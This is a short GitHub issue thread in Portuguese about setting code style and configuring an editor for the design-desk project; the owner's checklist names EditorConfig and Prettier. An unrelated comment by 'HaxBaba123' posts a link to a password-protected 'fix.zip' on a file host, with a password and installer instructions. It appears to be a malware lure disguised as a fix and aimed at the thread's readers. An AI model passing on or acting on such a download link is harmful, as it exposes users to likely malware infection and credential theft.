### ISSUE TITLE
Definir estilização do código e configurar o editor

### ISSUE THREAD

**Issue by jorgecostadesign** [jorgecostadesign/design-desk#2]

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jorgecostadesign** [comment]
- [ ] Ligar sincronização do editor
- [ ] Configurar o EditorConfig
- [ ] Configurar o Prettier
